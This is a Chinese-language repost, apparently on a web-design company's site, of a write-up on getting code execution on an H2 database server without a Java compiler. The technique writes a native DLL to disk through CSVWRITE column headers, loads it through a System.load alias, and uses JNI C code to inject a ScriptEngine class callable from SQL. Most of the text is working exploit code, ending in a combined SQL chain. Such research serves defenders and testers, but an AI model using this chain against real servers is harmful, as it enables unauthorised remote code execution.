本篇文章給大家分享的是有關(guān)如何利用原生庫和JNI實現(xiàn)H2數(shù)據(jù)庫漏洞利用,小編覺得挺實用的,因此分享給大家學習,希望大家閱讀完這篇文章后可以有所收獲,話不多說,跟著小編一起來看看吧。
成都創(chuàng)新互聯(lián)是一家集網(wǎng)站建設,華容企業(yè)網(wǎng)站建設,華容品牌網(wǎng)站建設,網(wǎng)站定制,華容網(wǎng)站建設報價,網(wǎng)絡營銷,網(wǎng)絡優(yōu)化,華容網(wǎng)站推廣為一體的創(chuàng)新建站企業(yè),幫助傳統(tǒng)企業(yè)提升企業(yè)形象加強企業(yè)競爭力??沙浞譂M足這一群體相比中小企業(yè)更為豐富、高端、多元的互聯(lián)網(wǎng)需求。同時我們時刻保持專業(yè)、時尚、前沿,時刻以成就客戶成長自我,堅持不斷學習、思考、沉淀、凈化自己,讓我們?yōu)楦嗟钠髽I(yè)打造出實用型網(wǎng)站。
通過使用原生庫(.dll或.so)和Java原生接口(JNI),找到一種新的方法來執(zhí)行任意Java代碼,而無需在目標服務器上使用Java編譯器。
假設我們不能使用CREATE ALIAS … AS … 命令,因為Java編譯器不可用。原因可能是它不是Java Development Kit(JDK)而是Java Runtime Environment(JRE),因此沒有編譯器?;蚴怯捎谖凑_設置PATH環(huán)境變量,導致無法找到Java編譯器javac。
但是,CREATE ALIAS … FOR … 命令可以使用:
當引用一個方法時,類必須已經(jīng)被編譯并包含在運行數(shù)據(jù)庫的類路徑中。僅支持靜態(tài)Java方法;類和方法都必須是公共的。
因此各個公共靜態(tài)方法都可以使用。最壞的情況是,只有h3-1.2.141.jar和JRE可用。此外,只有受支持的數(shù)據(jù)類型可用于嵌套函數(shù)調(diào)用。
在Java運行時庫rt.jar中瀏覽candidates時,我們發(fā)現(xiàn)System.load(String)方法允許加載原生庫。這意味著我們可以通過庫的入口點函數(shù)來執(zhí)行代碼。
但如何將庫加載到H2服務器上呢?雖然Windows上的Java支持UNC路徑并提取文件,但其拒絕實際加載它。而且這在Linux上也不起作用。那么,如何將文件寫入H2服務器呢?
在查看和研究了一些H2函數(shù)后,我們發(fā)現(xiàn)了一個FILE_WRITE文件寫入函數(shù)。不幸的是,F(xiàn)ILE_WRITE是在1.4.190中引入的。而我們需要的是在1.2.141中可用的函數(shù)。最終我們找到了一個名為CSVWRITE的函數(shù),這也是唯一一個名稱中帶“ write”的函數(shù)。
快速測試顯示了CSV列標頭也被打印了出來。查看CSV選項,可以看到有一個writeColumnHeader選項可用于禁用寫入列標頭。不幸的是,writeColumnHeader選項僅被添加在了1.3/1.4.177上。
但是在查看其他受支持的選項fieldSeparator,fieldDelimiter,escape,null和lineSeparator時,我蹦出了一個想法:如果我們將它們?nèi)壳蹇眨⑹褂肅SV列標頭寫入我們的數(shù)據(jù),會怎樣?如果H2數(shù)據(jù)庫引擎允許列具有任意長度的任意名稱,那么我們就能夠?qū)懭肴我鈹?shù)據(jù)。
查看H2的列語法,列的columnName可以是帶引號的名稱,定義如下:
" anything "
帶引號的名稱區(qū)分大小寫,并且可以包含空格。沒有最大名稱長度。兩個雙引號可用于在標識符內(nèi)創(chuàng)建一個單雙引號。
這聽起來很完美。讓我們看看我們是否可以在其中放入任意內(nèi)容,以及CSVWRITE是否具有二進制安全機制。
首先,讓我們生成涵蓋所有8-bit octet的測試數(shù)據(jù):
$ python -c 'import sys;[sys.stdout.write(chr(i)) for i in range(0,256)]' > test.bin $ sha1sum test.bin 4916d6bdb7f78e6803698cab32d1586ea457dfc8 test.bin
現(xiàn)在我們生成一系列CHAR(n)函數(shù)調(diào)用,它們將在SQL查詢中生成我們的二進制數(shù)據(jù):
xxd -p -c 256 test.bin | sed -e 's/../),CHAR(0x&/g' -e 's/^),//' -e 's/$/)/' -e 's/CHAR(0x22)/&,&/g'
然后,我們在以下CSVWRITE調(diào)用中使用它:
SELECT CSVWRITE('C:\Windows\Temp\test.bin', CONCAT('SELECT NULL "', … , '"'), 'ISO-8859-1', '', '', '', '', '');
最后,我們測試寫入的文件是否具有相同的校驗和:
C:\Windows\Temp> certutil -hashfile test.bin SHA1 SHA1 hash of file test.bin: 49 16 d6 bd b7 f7 8e 68 03 69 8c ab 32 d1 58 6e a4 57 df c8 CertUtil: -hashfile command completed successfully.
可以看到,文件應該是相同的!
既然我們可以使用內(nèi)置函數(shù)CSVWRITE,將原生庫寫入磁盤并通過為System.load(String)創(chuàng)建別名來加載它,我們就可以使用庫的入口點來實現(xiàn)代碼執(zhí)行。
讓我們更進一步,看看是否有辦法從SQL執(zhí)行任意命令/代碼。
Java Native Interface(JNI)允許原生代碼和Java虛擬機(JVM)之間的交互。因此,在這種情況下,它將允許我們與運行H2數(shù)據(jù)庫的JVM進行交互。
現(xiàn)在,我的想法是使用JNI通過ClassLoader.defineClass(byte[], int, int)將自定義Java類注入到運行的JVM中。這將允許我們創(chuàng)建一個別名并從SQL調(diào)用它。
使用 JNI 調(diào)用 JVM
首先,我們需要獲得正在運行的JVM的句柄。這可以通過JNI_GetCreatedJavaVMs函數(shù)來完成。然后,將當前線程附加到VM,并獲得JNI接口指針(JNIEnv)。 使用該指針,我們可以與JVM交互并調(diào)用JNI函數(shù),例如FindClass, GetStaticMethodID/GetMethodID> 和 CallStatic
// xxd -p -c 10000 bin/JNIScriptEngine.class | sed -e 's/../0x&,/g' -e 's/^/char buf[] = {/' -e 's/,$/};/' // public static JNIScriptEngine.eval(String js) : String char buf[] = { /* ... */ }; size_t bufLen = sizeof(buf); jbyteArray jData = (*g_env)->NewByteArray(g_env, bufLen); (*g_env)->SetByteArrayRegion(g_env, jData, 0, bufLen, (jbyte*)buf); JNIEnv * g_env; JavaVM* g_vm; jsize num_vms = 0; jint result = JNI_GetCreatedJavaVMs(&g_vm, 1, &num_vms); int getEnvStat = (*g_vm)->GetEnv(g_vm, (void **)&g_env, JNI_VERSION_1_6); if (getEnvStat == JNI_EDETACHED) { // printf("GetEnv: not attached\n"); if ((*g_vm)->AttachCurrentThread(g_vm, (void **) &g_env, NULL) != 0) { // printf("Failed to attach\n"); } } else if (getEnvStat == JNI_OK) { // printf("GetEnv: everything's fine\n"); } else if (getEnvStat == JNI_EVERSION) { // printf("GetEnv: version not supported\n"); } jclass cls; jmethodID meth; jobject obj; cls = (*g_env)->FindClass(g_env, "java/lang/ClassLoader"); // static java.lang.ClassLoader.getSystemClassLoader() : java.lang.ClassLoader meth = (*g_env)->GetStaticMethodID(g_env, cls, "getSystemClassLoader", "()Ljava/lang/ClassLoader;"); jobject systemClassLoader = (*g_env)->CallStaticObjectMethod(g_env, cls, meth); // java.lang.ClassLoader.defineClass(byte[], int, int) : java.lang.Class meth = (*g_env)->GetMethodID(g_env, cls, "defineClass", "([BII)Ljava/lang/Class;"); jobject loadedClass = (*g_env)->CallObjectMethod(g_env, systemClassLoader, meth, jData, 0, (jint)bufLen); (*g_env)->DeleteLocalRef(g_env, jData); (*g_vm)->DetachCurrentThread(g_vm);
這基本上是模仿了以下Java代碼:
Class cls = Class.forName("java.lang.ClassLoader"); Method meth = cls.getDeclaredMethod("getSystemClassLoader", new Class[0]); Object systemClassLoader = meth.invoke(null, new Object[0]); meth = cls.getDeclaredMethod("defineClass", new Class[] { byte[].class, int.class, int.class }); meth.setAccessible(true); meth.invoke(systemClassLoader, new Object[] { jData, 0, jData.length });
自定義Java類JNIScriptEngine只有一個公共靜態(tài)方法,它使用可用的ScriptEngine實例評估傳遞的腳本:
public class JNIScriptEngine { public static String eval(String script) throws Exception { return new javax.script.ScriptEngineManager().getEngineFactories().get(0).getScriptEngine().eval(script).toString(); } }
最終,整合在一起的代碼如下:
-- write native library SELECT CSVWRITE('C:\Windows\Temp\JNIScriptEngine.dll', CONCAT('SELECT NULL "', ... , '"'), 'ISO-8859-1', '', '', '', '', ''); -- load native library CREATE ALIAS IF NOT EXISTS System_load FOR "java.lang.System.load"; CALL System_load('C:\Windows\Temp\JNIScriptEngine.dll'); -- evaluate script CREATE ALIAS IF NOT EXISTS JNIScriptEngine_eval FOR "JNIScriptEngine.eval"; CALL JNIScriptEngine_eval('7*191');
這樣我們就可以從SQL執(zhí)行任意的JavaScript代碼了。
以上就是如何利用原生庫和JNI實現(xiàn)H2數(shù)據(jù)庫漏洞利用,小編相信有部分知識點可能是我們?nèi)粘9ぷ鲿姷交蛴玫降?。希望你能通過這篇文章學到更多知識。更多詳情敬請關(guān)注創(chuàng)新互聯(lián)行業(yè)資訊頻道。